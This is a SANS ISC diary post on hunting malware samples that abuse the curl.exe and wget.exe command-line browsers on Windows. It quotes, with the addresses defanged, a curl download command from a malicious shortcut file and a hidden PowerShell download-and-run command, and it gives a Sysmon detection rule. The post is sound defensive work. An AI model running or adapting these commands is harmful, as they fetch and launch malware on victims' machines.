Keep an Eye on Command-Line Browsers

Published: 2020-02-14. Last Updated: 2020-02-14 06:26:15 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

For a few weeks, I’m searching for suspicious files that make use of a command line browser like curl.exe or wget.exe in Windows environment. Wait, you were not aware of this? Just open a cmd.exe and type ‘curl.exe’ on your Windows 10 host:

If tools like bitsadmin.exe are well-known to be (ab)used by malware samples[1], today, less attention is given to command-llne browsers like curl.exe or wget.exe. Those tools are powerfull (see my diary about many curl features[2]) and, in my opinion, deserve to be kept under your hunting rules.

I'm hunting for samples on VT that use one of those two browsers and I found a bunch of them:

Most of them are PE files and the average detection score is 16.

Win32 EXE 208
ZIP 40
RAR 12
Windows Installer 9
CAB 3
MS Word Document 3
DOS EXE 2
Windows shortcut 2
Android 1
Win32 DLL 1
unknown 1

Some of them are very simple but effective. Here is an example of command embedded in a malicious .lnk file :

C:\Windows\System32\cmd.exe /c curl.exe hxxp://87[.]57[.]141[.]215/Cell.png -o C:\Windows\Tasks\Cell.png

If curl.exe is available as a standard tool in latest Windows operating systems, don't forget that tools can be installed via 3rd party applications or packages. I searched across many Windows devices and found alternatives:

(Via GNU tools)
C:\Program Files (x86)\GnuWin32\bin\wget.exe
 
(Via MingW)
C:\PGM\Git\mingw64\bin\curl.exe
 
(Or Cygwin)
C:\Program Files\Cygwin\bin\wget.exe

Sometimes, if no command-line browser is not available, the sample just downloads its own copy. Example:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass \
    -noprofile -windowstyle hidden 
    (new-object system.net.webclient).downloadfile('hxxp://www[.]kuaishounew[.]com/wget.exe','wget.exe'); \
&start start2.bat

I found very old samples that used wget.exe to fetch malicious files (one from 2015!) but today we have powerful tools to keep an eye on such tools, a Sysmon rule can be helpful to track them:

<Image condition="contains any">wget.exe;curl.exe</Image>

Happy hunting!

[1] https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675
[2] https://isc.sans.edu/forums/diary/Exploiting+the+Power+of+Curl/23934

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: Command curlexe Malware Sysmon wgetexe
2 comment(s)
ISC Stormcast For Friday, February 14th 2020 https://isc.sans.edu/podcastdetail.html?id=6868

Comments

Login here to join the discussion.


Diary Archives